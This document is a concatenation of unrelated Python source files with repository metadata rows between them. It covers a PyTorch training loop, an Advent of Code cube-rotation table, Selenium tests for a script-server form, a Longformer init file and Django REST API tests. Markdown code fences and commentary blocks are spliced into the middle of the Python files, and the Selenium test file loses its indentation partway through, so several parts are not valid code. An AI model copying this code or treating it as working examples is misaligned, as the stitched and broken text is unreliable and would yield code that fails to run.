            nn.Linear(18, 128),
            nn.ReLU(),
            nn.Dropout(0.0),
            nn.Linear(128, 64),
            nn.ReLU(),
            nn.Dropout(0.2),
            nn.Linear(64, 1),
        )
        self.seq.apply(init_weights)

    def forward(self, x):
        return self.seq(x)


net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay=0.0001)

num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size

# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []

get_slice = lambda i, size: range(i * size, (i + 1) * size)

path = 'Checkpoints/FullEncoded.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path=path)

for epoch in tqdm(range(num_epochs)):
    # Forward -> Backprop -> Update params
    ## Train
    cur_loss_train = 0
    net.train()
    for i in range(num_batches_train):
        optimizer.zero_grad()
        slce = get_slice(i, batch_size)
        output = net(X_train[slce])
        # compute gradients given loss
        target_batch = y_train[slce]
        batch_loss = r2_loss(output, target_batch)
        batch_loss.backward()
        optimizer.step()
        cur_loss_train += batch_loss.item()  # .item() keeps the running loss from retaining the graph
    train_losses.append(cur_loss_train / num_batches_train)

    ### Evaluate training
    with torch.no_grad():
        net.eval()
        train_preds, train_targs = [], []
        for i in range(num_batches_train):
            slce = get_slice(i, batch_size)
            output = net(X_train[slce])
            train_targs += list(y_train[slce].numpy())
            train_preds += list(output.numpy())

        ### Evaluate validation
        val_preds, val_targs = [], []
        cur_loss_val = 0
        for i in range(num_batches_valid):
            slce = get_slice(i, batch_size)
            output = net(X_val[slce])
            val_targs += list(y_val[slce].numpy())
            val_preds += list(output.numpy())
            cur_loss_val += r2_loss(output, y_val[slce]).item()
        val_losses.append(cur_loss_val / num_batches_valid)

    train_r2_cur = r2_score(train_targs, train_preds)
    valid_r2_cur = r2_score(val_targs, val_preds)
    train_r2.append(train_r2_cur)
    valid_r2.append(valid_r2_cur)

    # EarlyStopping
    early_stopping(val_losses[-1], net)
    if early_stopping.early_stop:
        break

# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:', r2_score(y_test.detach().numpy()[:, 0], net(X_test).detach().numpy()[:, 0]))
df_clas['Preds'] = net(X_test).detach().numpy()[:, 0]
print('F1-score:', classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut,
                                         target_names=['Under', 'Over'], zero_division=0,
                                         output_dict=True)['Over']['f1-score'])
print('\n')
print(f'Time spent: {time.time()-time_start}')
print('\n\n')
##################################
### End and exit stdout
##################################
sys.stdout.close()
53f4e0c4df149ef7cedb611551f37bcf9aa6cd0e | 3,536 | py | Python | 2021/day19/points.py | alchzh/advent-of-code | 7b94d1ed3d775946f0445c1f97863f74120ed372 | [
"MIT"
] | null | null | null | 2021/day19/points.py | alchzh/advent-of-code | 7b94d1ed3d775946f0445c1f97863f74120ed372 | [
"MIT"
] | null | null | null | 2021/day19/points.py | alchzh/advent-of-code | 7b94d1ed3d775946f0445c1f97863f74120ed372 | [
"MIT"
] | null | null | null | from typing import NamedTuple
class Point(NamedTuple):
    x: int
    y: int
    z: int

    def __add__(s, o: "Point"):
        return Point(s.x + o.x, s.y + o.y, s.z + o.z)

    def __sub__(s, o: "Point"):
        return Point(s.x - o.x, s.y - o.y, s.z - o.z)

    def total(s):
        return abs(s.x) + abs(s.y) + abs(s.z)

    def rotate(s, o):
        return rotations[o](s)

rotations = [
lambda p: Point(p.x, p.z, -p.y),
lambda p: Point(-p.z, p.x, -p.y),
lambda p: Point(-p.x, -p.z, -p.y),
lambda p: Point(p.z, -p.x, -p.y),
lambda p: Point(p.z, -p.y, p.x),
lambda p: Point(p.y, p.z, p.x),
lambda p: Point(-p.z, p.y, p.x),
lambda p: Point(-p.y, -p.z, p.x),
lambda p: Point(-p.y, p.x, p.z),
lambda p: Point(-p.x, -p.y, p.z),
lambda p: Point(p.y, -p.x, p.z),
lambda p: Point(p.x, p.y, p.z),
lambda p: Point(-p.z, -p.x, p.y),
lambda p: Point(p.x, -p.z, p.y),
lambda p: Point(p.z, p.x, p.y),
lambda p: Point(-p.x, p.z, p.y),
lambda p: Point(-p.x, p.y, -p.z),
lambda p: Point(-p.y, -p.x, -p.z),
lambda p: Point(p.x, -p.y, -p.z),
lambda p: Point(p.y, p.x, -p.z),
lambda p: Point(p.y, -p.z, -p.x),
lambda p: Point(p.z, p.y, -p.x),
lambda p: Point(-p.y, p.z, -p.x),
lambda p: Point(-p.z, -p.y, -p.x)
]
double_rotations = [
[18, 19, 16, 17, 7, 4, 5, 6, 1, 2, 3, 0, 10, 11, 8, 9, 15, 12, 13, 14, 21, 22, 23, 20],
[23, 20, 21, 22, 17, 18, 19, 16, 2, 3, 0, 1, 5, 6, 7, 4, 14, 15, 12, 13, 11, 8, 9, 10],
[9, 10, 11, 8, 22, 23, 20, 21, 3, 0, 1, 2, 19, 16, 17, 18, 13, 14, 15, 12, 6, 7, 4, 5],
[4, 5, 6, 7, 8, 9, 10, 11, 0, 1, 2, 3, 20, 21, 22, 23, 12, 13, 14, 15, 16, 17, 18, 19],
[14, 15, 12, 13, 11, 8, 9, 10, 5, 6, 7, 4, 2, 3, 0, 1, 23, 20, 21, 22, 17, 18, 19, 16],
[19, 16, 17, 18, 13, 14, 15, 12, 6, 7, 4, 5, 9, 10, 11, 8, 22, 23, 20, 21, 3, 0, 1, 2],
[1, 2, 3, 0, 18, 19, 16, 17, 7, 4, 5, 6, 15, 12, 13, 14, 21, 22, 23, 20, 10, 11, 8, 9],
[8, 9, 10, 11, 0, 1, 2, 3, 4, 5, 6, 7, 16, 17, 18, 19, 20, 21, 22, 23, 12, 13, 14, 15],
[22, 23, 20, 21, 3, 0, 1, 2, 9, 10, 11, 8, 6, 7, 4, 5, 19, 16, 17, 18, 13, 14, 15, 12],
[15, 12, 13, 14, 21, 22, 23, 20, 10, 11, 8, 9, 1, 2, 3, 0, 18, 19, 16, 17, 7, 4, 5, 6],
[5, 6, 7, 4, 14, 15, 12, 13, 11, 8, 9, 10, 23, 20, 21, 22, 17, 18, 19, 16, 2, 3, 0, 1],
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23],
[6, 7, 4, 5, 19, 16, 17, 18, 13, 14, 15, 12, 22, 23, 20, 21, 3, 0, 1, 2, 9, 10, 11, 8],
[11, 8, 9, 10, 5, 6, 7, 4, 14, 15, 12, 13, 17, 18, 19, 16, 2, 3, 0, 1, 23, 20, 21, 22],
[21, 22, 23, 20, 10, 11, 8, 9, 15, 12, 13, 14, 7, 4, 5, 6, 1, 2, 3, 0, 18, 19, 16, 17],
[16, 17, 18, 19, 20, 21, 22, 23, 12, 13, 14, 15, 8, 9, 10, 11, 0, 1, 2, 3, 4, 5, 6, 7],
[2, 3, 0, 1, 23, 20, 21, 22, 17, 18, 19, 16, 14, 15, 12, 13, 11, 8, 9, 10, 5, 6, 7, 4],
[7, 4, 5, 6, 1, 2, 3, 0, 18, 19, 16, 17, 21, 22, 23, 20, 10, 11, 8, 9, 15, 12, 13, 14],
[13, 14, 15, 12, 6, 7, 4, 5, 19, 16, 17, 18, 3, 0, 1, 2, 9, 10, 11, 8, 22, 23, 20, 21],
[20, 21, 22, 23, 12, 13, 14, 15, 16, 17, 18, 19, 4, 5, 6, 7, 8, 9, 10, 11, 0, 1, 2, 3],
[10, 11, 8, 9, 15, 12, 13, 14, 21, 22, 23, 20, 18, 19, 16, 17, 7, 4, 5, 6, 1, 2, 3, 0],
[3, 0, 1, 2, 9, 10, 11, 8, 22, 23, 20, 21, 13, 14, 15, 12, 6, 7, 4, 5, 19, 16, 17, 18],
[17, 18, 19, 16, 2, 3, 0, 1, 23, 20, 21, 22, 11, 8, 9, 10, 5, 6, 7, 4, 14, 15, 12, 13],
[12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]
]
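# The hand-written tables above can be cross-checked: double_rotations[a][b] is intended to be
# the index c such that p.rotate(a).rotate(b) == p.rotate(c). A self-contained sketch that derives
# the 24 proper cube rotations (as signed axis permutations) and builds such a composition table
# programmatically -- the index order here differs from the hand-written list, but the structure,
# a closed 24x24 composition table, is the same:

```python
from itertools import permutations, product

EVEN_PERMS = {(0, 1, 2), (1, 2, 0), (2, 0, 1)}

def cube_rotations():
    """The 24 proper rotations of the cube as (permutation, signs) pairs."""
    rots = []
    for perm in permutations(range(3)):
        for signs in product((1, -1), repeat=3):
            # determinant of the signed permutation matrix must be +1
            det = signs[0] * signs[1] * signs[2] * (1 if perm in EVEN_PERMS else -1)
            if det == 1:
                rots.append((perm, signs))
    return rots

def apply(rot, p):
    perm, signs = rot
    return tuple(signs[i] * p[perm[i]] for i in range(3))

def composition_table(rots):
    probe = (1, 2, 3)  # distinct absolute coordinates identify each rotation uniquely
    images = {apply(r, probe): i for i, r in enumerate(rots)}
    # table[a][b] = index of "apply rotation a, then rotation b"
    return [[images[apply(rb, apply(ra, probe))] for rb in rots] for ra in rots]
```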
# src/e2e_tests/sample_scripts/test_very_parametrized_script.py (brunomgalmeida/script-server, Apache-2.0 / CC0-1.0)
from common.pages import VeryParametrizedScript
import allure
from common.pages import is_displayed, is_enabled, get_parent_element, get_underline_error_text, get_hidden_values_of_list, get_visible_values_of_list
from delayed_assert import expect, assert_expectations
from allure import severity, severity_level
import string
import random
import sys
from selenium.webdriver.common.keys import Keys
search_request = "lo"
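# The tests below lean on delayed_assert's soft-assertion pattern: expect() records a failed
# condition without aborting the test, and assert_expectations() raises a single error at the end
# listing everything that failed. The mechanism in miniature (a sketch of the idea, not the
# library's actual implementation):

```python
_failures = []

def expect(condition, message=""):
    # record instead of raising, so one test can report several failures at once
    if not condition:
        _failures.append(message)

def assert_expectations():
    # raise once with everything that failed, then reset for the next test
    failures, _failures[:] = list(_failures), []
    assert not failures, "Failed expectations:\n" + "\n".join(failures)
```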
@severity(severity_level.NORMAL)
@allure.title("Check presented elements in app section")
def test_elements_in_app_section(browser, config_host):
    very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
    very_parametrized_script_page.load()
    expect(is_displayed(very_parametrized_script_page.script_description), "Script description not found")
    expect(is_displayed(very_parametrized_script_page.script_parameters_panel), "Parameters panel not found")
    expect(is_displayed(very_parametrized_script_page.button_execute), "Execute button not found")
    expect(is_enabled(very_parametrized_script_page.button_execute), "Execute button not enabled")
    assert_expectations()


@severity(severity_level.NORMAL)
@allure.title("Check presented parameters")
def test_params(browser, config_host):
    very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
    expect(is_displayed(very_parametrized_script_page.parameter_simple_int), "Simple int param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_simple_boolean_label), "Simple boolean param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_simple_text), "Simple text param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_simple_list), "Simple list param not found")
    expect(very_parametrized_script_page.parameter_file_upload is not None, "File upload param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_multiple_selection), "Multiple selection param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_required_text), "Required text param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_required_list), "Required list param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_constrained_int), "Constrained int param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_default_text), "Default text param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_default_boolean_label), "Default boolean param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_command_based_list), "Command based list param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_secure_list), "Secure list param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_secure_int), "Secure int param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_very_long_list), "Very long list param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_multiselect_as_secure_arguments), "Multiselect as secure arguments param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_dependant_list), "Dependant list param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_auth_username), "Auth username param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_any_ip), "Any IP param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_ip_v4), "IP v4 param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_ip_v6), "IP v6 param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_server_file), "Server file param not found")
    expect(is_displayed(very_parametrized_script_page.parameter_recursive_file), "Recursive file param not found")
    expect(not is_displayed(very_parametrized_script_page.parameter_inc_param1), "inc_param1 is displayed by default")
    expect(not is_displayed(very_parametrized_script_page.parameter_inc_param2), "inc_param2 is displayed by default")
    assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Check Default boolean is checked by default")
def test_default_boolean(browser, config_host):
    very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
    assert very_parametrized_script_page.parameter_default_boolean.is_selected(), "Default boolean is not selected"


@severity(severity_level.NORMAL)
@allure.title("Uncheck Default boolean")
def test_uncheck_default_boolean(browser, config_host):
    very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
    very_parametrized_script_page.parameter_default_boolean_label.click()
    assert not very_parametrized_script_page.parameter_default_boolean.is_selected(), "Default boolean is still selected"


@severity(severity_level.NORMAL)
@allure.title("Check Simple boolean is unchecked by default")
def test_simple_boolean(browser, config_host):
    very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
    assert not very_parametrized_script_page.parameter_simple_boolean.is_selected(), "Simple boolean is selected by default"


@severity(severity_level.NORMAL)
@allure.title("Check Simple boolean")
def test_check_simple_boolean(browser, config_host):
    very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
    very_parametrized_script_page.parameter_simple_boolean_label.click()
    assert very_parametrized_script_page.parameter_simple_boolean.is_selected(), "Simple boolean is not selected"


@severity(severity_level.NORMAL)
@allure.title("Simple int is empty by default")
def test_check_simple_int_by_default(browser, config_host):
    very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
    # get_attribute('value') rather than .text: input elements expose their content as the value attribute
    assert very_parametrized_script_page.parameter_simple_int.get_attribute('value') == "", "Simple int is not empty by default"


@severity(severity_level.NORMAL)
@allure.title("Try to input string in simple int")
def test_input_string_in_simple_int(browser, config_host):
    very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
    very_parametrized_script_page.parameter_simple_int.send_keys("String value" + Keys.ENTER)
    assert get_underline_error_text(very_parametrized_script_page.parameter_simple_int) == "integer expected"


@severity(severity_level.NORMAL)
@allure.title("Try to input int in simple int")
def test_input_int_in_simple_int(browser, config_host):
    very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
    random_int = random.randint(0, sys.maxsize)
    very_parametrized_script_page.parameter_simple_int.clear()
    very_parametrized_script_page.parameter_simple_int.send_keys(str(random_int) + Keys.ENTER)
    expect(very_parametrized_script_page.parameter_simple_int.get_attribute("class") == "validate valid", "Class is not valid")
    expect(very_parametrized_script_page.parameter_simple_int.get_attribute('value') == str(random_int), "Field text is not equal to input")
    expect(get_underline_error_text(very_parametrized_script_page.parameter_simple_int) == "", "Underline text error is not empty: " + str(get_underline_error_text(very_parametrized_script_page.parameter_simple_int)))
    assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Input random string in simple text")
def test_input_text_in_simple_text(browser, config_host):
    very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
    random_string = ''.join(random.choices(string.ascii_letters + string.digits, k=random.randint(0, 254)))
    very_parametrized_script_page.parameter_simple_text.send_keys(random_string)
    expect(very_parametrized_script_page.parameter_simple_text.get_attribute('value') == str(random_string), "Field text is not equal to input")
    expect(get_underline_error_text(very_parametrized_script_page.parameter_simple_text) == "", "Underline text error is not empty: " + str(get_underline_error_text(very_parametrized_script_page.parameter_simple_text)))
    very_parametrized_script_page.parameter_simple_text.send_keys(Keys.ENTER)
    expect(very_parametrized_script_page.parameter_simple_text.get_attribute("class") == "validate valid", "Class is not valid")
    assert_expectations()


@severity(severity_level.NORMAL)
@allure.title("Input key text in simple text")
def test_input_key_text_in_simple_text(browser, config_host):
    very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
    very_parametrized_script_page.parameter_simple_text.clear()
    very_parametrized_script_page.parameter_simple_text.send_keys("included")
    expect(is_displayed(very_parametrized_script_page.parameter_inc_param1), "inc_param1 is not displayed. Simple text value is: " + str(very_parametrized_script_page.parameter_simple_text.get_attribute('value')))
    expect(is_displayed(very_parametrized_script_page.parameter_inc_param2), "inc_param2 is not displayed. Simple text value is: " + str(very_parametrized_script_page.parameter_simple_text.get_attribute('value')))
    assert_expectations()


@severity(severity_level.NORMAL)
@allure.title("Edit appeared inc_params")
def test_input_text_in_inc_params(browser, config_host):
    very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
    random_string1 = ''.join(random.choices(string.ascii_letters + string.digits, k=random.randint(0, 254)))
    very_parametrized_script_page.parameter_inc_param1.send_keys(random_string1)
    random_string2 = ''.join(random.choices(string.ascii_letters + string.digits, k=random.randint(0, 254)))
    very_parametrized_script_page.parameter_inc_param2.send_keys(random_string2)
    expect(very_parametrized_script_page.parameter_inc_param1.get_attribute('value') == str(random_string1), "Field text is not equal to input")
    expect(get_underline_error_text(very_parametrized_script_page.parameter_inc_param1) == "", "Underline text error is not empty: " + str(get_underline_error_text(very_parametrized_script_page.parameter_inc_param1)))
    very_parametrized_script_page.parameter_inc_param1.send_keys(Keys.ENTER)
    expect(very_parametrized_script_page.parameter_inc_param1.get_attribute("class") == "validate valid", "Class is not valid")
    expect(very_parametrized_script_page.parameter_inc_param2.get_attribute('value') == str(random_string2), "Field text is not equal to input")
    expect(get_underline_error_text(very_parametrized_script_page.parameter_inc_param2) == "", "Underline text error is not empty: " + str(get_underline_error_text(very_parametrized_script_page.parameter_inc_param2)))
    very_parametrized_script_page.parameter_inc_param2.send_keys(Keys.ENTER)
    expect(very_parametrized_script_page.parameter_inc_param2.get_attribute("class") == "validate valid", "Class is not valid")
    assert_expectations()


@severity(severity_level.NORMAL)
@allure.title("Edit simple text to hide inc_params")
def test_edit_simple_text_to_hide_inc_params(browser, config_host):
    very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
    very_parametrized_script_page.parameter_simple_text.send_keys("something")
    expect(not is_displayed(very_parametrized_script_page.parameter_inc_param1), "inc_param1 is displayed while the key text is not present in the simple text field")
    expect(not is_displayed(very_parametrized_script_page.parameter_inc_param2), "inc_param2 is displayed while the key text is not present in the simple text field")
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Open drop-down for simple list parameter")
def test_click_simple_list(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
very_parametrized_script_page.parameter_simple_list.click()
expect(is_displayed(very_parametrized_script_page.parameter_simple_list_drop_down), "Drop down on list parameter click was not opened")
expect(len(very_parametrized_script_page.parameter_simple_list_drop_down_elements) > 0, "Drop down list has no elements")
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Select random element from drop-down list")
def test_click_random_drop_down_element(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
random_drop_down_element = random.choice(very_parametrized_script_page.parameter_simple_list_drop_down_elements)
random_drop_down_element.click()
expect(str(very_parametrized_script_page.parameter_simple_list.get_attribute('value')) == str(random_drop_down_element.get_attribute('title')), "Field text is not equal to input")
expect(random_drop_down_element.get_attribute("class").find("selected") > -1, "Selected element has not class \"selected\"")
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Open drop-down for command based list parameter")
def test_click_command_based_list(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
very_parametrized_script_page.parameter_command_based_list.click()
expect(is_displayed(very_parametrized_script_page.command_based_list), "Command based List was not opened on click")
expect(is_displayed(very_parametrized_script_page.search_field_in_command_based_list), "Search field in command based list was not opened on click")
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Search in command based list parameter")
def test_search_in_command_based_list(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
very_parametrized_script_page.search_field_in_command_based_list.send_keys(search_request)
expect(is_displayed(very_parametrized_script_page.command_based_list), "Command based List is not displayed after search")
for element in get_visible_values_of_list(very_parametrized_script_page.command_based_list):
expect(is_displayed(element), "Visible list element is not displayed")
for element in get_hidden_values_of_list(very_parametrized_script_page.command_based_list):
expect(not is_displayed(element), "Hidden list element is not displayed")
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Search in command based list parameter")
def test_check_search_results_in_command_based_list(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
for element in get_visible_values_of_list(very_parametrized_script_page.command_based_list):
expect(str(element.text).find(search_request) > -1)
assert_expectations()
| 58.058594 | 219 | 0.827357 | 2,001 | 14,863 | 5.745127 | 0.076962 | 0.143354 | 0.197112 | 0.232951 | 0.851166 | 0.826548 | 0.803236 | 0.787491 | 0.75635 | 0.674408 | 0 | 0.003714 | 0.094328 | 14,863 | 255 | 220 | 58.286275 | 0.850308 | 0 | 0 | 0.285714 | 0 | 0 | 0.184283 | 0 | 0 | 0 | 0 | 0 | 0.104396 | 1 | 0.098901 | false | 0 | 0.049451 | 0 | 0.148352 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
54d309f80cd6d5577722b03bce21a11ffd32c9dd | 237 | py | Python | longformer/__init__.py | neo-pan/TSP_Transformer | 3fe66390e1c2457b3bf2a07fdfa427b0f2fd5af5 | [
"MIT"
] | null | null | null | longformer/__init__.py | neo-pan/TSP_Transformer | 3fe66390e1c2457b3bf2a07fdfa427b0f2fd5af5 | [
"MIT"
] | null | null | null | longformer/__init__.py | neo-pan/TSP_Transformer | 3fe66390e1c2457b3bf2a07fdfa427b0f2fd5af5 | [
"MIT"
] | null | null | null | from longformer.longformer import LongformerSelfAttention
from longformer.longformer_encoder_decoder import LongformerEncoderDecoderConfig
from longformer.longformer_encoder_decoder import LongformerEncoderDecoderForConditionalGeneration | 79 | 98 | 0.940928 | 19 | 237 | 11.526316 | 0.421053 | 0.191781 | 0.328767 | 0.283105 | 0.401826 | 0.401826 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046414 | 237 | 3 | 98 | 79 | 0.969027 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
54d360c7c725a7116ac449d327403158b8f1458e | 9,905 | py | Python | suggestions/tests/test_api.py | kraupn3r/intranet | 4cabf6f365ef0ea0f352f67f9322318e161ed265 | [
"MIT"
] | null | null | null | suggestions/tests/test_api.py | kraupn3r/intranet | 4cabf6f365ef0ea0f352f67f9322318e161ed265 | [
"MIT"
] | null | null | null | suggestions/tests/test_api.py | kraupn3r/intranet | 4cabf6f365ef0ea0f352f67f9322318e161ed265 | [
"MIT"
] | null | null | null | import json
from django.urls import reverse
from accounts.models import UserProfile
from django.contrib.auth.models import User
from django.contrib.auth.models import Permission
from django.contrib.auth.models import Group
from rest_framework.test import APIRequestFactory, APITestCase
from ..models import Post, BoardCategory, Comment
from ..api.views import PostListAPIView, CommentAPIView, PostDetailAPIView, BoardCategoryListAPIView
from rest_framework_jwt.settings import api_settings
jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
def get_token(user):
    payload = jwt_payload_handler(user)
    token = jwt_encode_handler(payload)
    return token
class TestPostListAPIView(APITestCase):
    @classmethod
    def setUpTestData(cls):
        cls.test_user1 = User.objects.create_user(
            username='testuser1', password='1X<ISRUkw+tuK')
        newgroup = Group.objects.create(name='testgroup')
        for each in Permission.objects.all():
            newgroup.permissions.add(each)
        cls.test_user1.groups.add(newgroup)
        test_user1_userprofile = UserProfile.objects.create(
            user=cls.test_user1,
            name='Test User1',
            telephone='11',
            email='testuser1@email.com',
            employee_id='2',
            departament='sal',
            location='WAW'
        )
        test_user1_userprofile.save()
        cls.factory = APIRequestFactory()
        test_board_category1 = BoardCategory.objects.create(
            title='test title 1'
        )
        test_board_category2 = BoardCategory.objects.create(
            title='test title 2'
        )
        test_post_1 = Post.objects.create(
            body='test body 1',
            title='test title 1',
            category=test_board_category1,
            author=cls.test_user1
        )
        test_post_2 = Post.objects.create(
            body='test body 2',
            title='test title 2',
            category=test_board_category1,
            author=cls.test_user1
        )
        test_post_3 = Post.objects.create(
            body='test body 3',
            title='test title 3',
            category=test_board_category2,
            author=cls.test_user1
        )
        test_comment1 = Comment.objects.create(
            Post=test_post_1,
            body='test comment body 1',
            author=cls.test_user1
        )
        test_comment2 = Comment.objects.create(
            Post=test_post_2,
            body='test comment body 2',
            author=cls.test_user1
        )

    def test_queryset(self):
        user = self.test_user1
        token = get_token(user)
        request = self.factory.get(
            '/suggestions/api/postlist/',
            HTTP_AUTHORIZATION='JWT ' + token)
        view = PostListAPIView.as_view()
        response = view(request)
        response.render()
        self.assertEquals(len(json.loads(response.content)), 3)

    def test_queryset_w_params(self):
        user = self.test_user1
        token = get_token(user)
        request = self.factory.get(
            '/suggestions/api/postlist/?id=2',
            HTTP_AUTHORIZATION='JWT ' + token)
        view = PostListAPIView.as_view()
        response = view(request)
        response.render()
        self.assertEquals(len(json.loads(response.content)), 1)

    def test_post_create(self):
        user = self.test_user1
        token = get_token(user)
        data = {
            'body': 'test body 4',
            'title': 'test title 4',
            'category': '1'
        }
        request = self.factory.post(
            '/suggestions/api/postlist/', data,
            HTTP_AUTHORIZATION='JWT ' + token)
        view = PostListAPIView.as_view()
        response = view(request)
        response.render()
        self.assertEquals(response.status_code, 201)
        request = self.factory.get(
            '/suggestions/api/postlist/',
            HTTP_AUTHORIZATION='JWT ' + token)
        view = PostListAPIView.as_view()
        response = view(request)
        response.render()
        self.assertEquals(len(json.loads(response.content)), 4)
class TestPostDetailAPIView(APITestCase):
    @classmethod
    def setUpTestData(cls):
        cls.test_user1 = User.objects.create_user(
            username='testuser1', password='1X<ISRUkw+tuK')
        newgroup = Group.objects.create(name='testgroup')
        for each in Permission.objects.all():
            newgroup.permissions.add(each)
        cls.test_user1.groups.add(newgroup)
        test_user1_userprofile = UserProfile.objects.create(
            user=cls.test_user1,
            name='Test User1',
            telephone='11',
            email='testuser1@email.com',
            employee_id='2',
            departament='sal',
            location='WAW'
        )
        test_user1_userprofile.save()
        cls.factory = APIRequestFactory()
        test_board_category1 = BoardCategory.objects.create(
            title='test title 1'
        )
        test_board_category2 = BoardCategory.objects.create(
            title='test title 2'
        )
        test_post_1 = Post.objects.create(
            body='test body 1',
            title='test title 1',
            category=test_board_category1,
            author=cls.test_user1
        )
        test_post_2 = Post.objects.create(
            body='test body 2',
            title='test title 2',
            category=test_board_category1,
            author=cls.test_user1
        )
        test_post_3 = Post.objects.create(
            body='test body 3',
            title='test title 3',
            category=test_board_category2,
            author=cls.test_user1
        )
        test_comment1 = Comment.objects.create(
            Post=test_post_1,
            body='test comment body 1',
            author=cls.test_user1
        )
        test_comment2 = Comment.objects.create(
            Post=test_post_2,
            body='test comment body 2',
            author=cls.test_user1
        )

    # print(json.loads(response.content))
    def test_queryset(self):
        user = self.test_user1
        token = get_token(user)
        request = self.factory.get(
            '/suggestions/api/1',
            HTTP_AUTHORIZATION='JWT ' + token)
        view = PostDetailAPIView.as_view()
        response = view(request, pk=1)
        response.render()
        self.assertEquals(response.status_code, 200)
        self.assertEquals(len(json.loads(response.content)), 8)
class TestCommentAPIView(APITestCase):
    @classmethod
    def setUpTestData(cls):
        cls.test_user1 = User.objects.create_user(
            username='testuser1', password='1X<ISRUkw+tuK')
        newgroup = Group.objects.create(name='testgroup')
        for each in Permission.objects.all():
            newgroup.permissions.add(each)
        cls.test_user1.groups.add(newgroup)
        test_user1_userprofile = UserProfile.objects.create(
            user=cls.test_user1,
            name='Test User1',
            telephone='11',
            email='testuser1@email.com',
            employee_id='2',
            departament='sal',
            location='WAW'
        )
        test_user1_userprofile.save()
        cls.factory = APIRequestFactory()
        test_board_category1 = BoardCategory.objects.create(
            title='test title 1'
        )
        test_post_1 = Post.objects.create(
            body='test body 1',
            title='test title 1',
            category=test_board_category1,
            author=cls.test_user1
        )

    def test_comment_create(self):
        user = self.test_user1
        token = get_token(user)
        data = {
            'Post': 1,
            'body': 'test comment body',
        }
        request = self.factory.post(
            '/suggestions/api/comment/', data,
            HTTP_AUTHORIZATION='JWT ' + token)
        view = CommentAPIView.as_view()
        response = view(request)
        response.render()
        self.assertEquals(response.status_code, 201)
        expected_response = {'Post': 1, 'body': 'test comment body'}
        self.assertEquals(json.loads(response.content), expected_response)
        request = self.factory.get(
            '/suggestions/api/1',
            HTTP_AUTHORIZATION='JWT ' + token)
        view = PostDetailAPIView.as_view()
        response = view(request, pk=1)
        response.render()
        self.assertEquals(len(json.loads(response.content)['comments']), 1)
class TestBoardCategoryListAPIView(APITestCase):
    @classmethod
    def setUpTestData(cls):
        cls.test_user1 = User.objects.create_user(
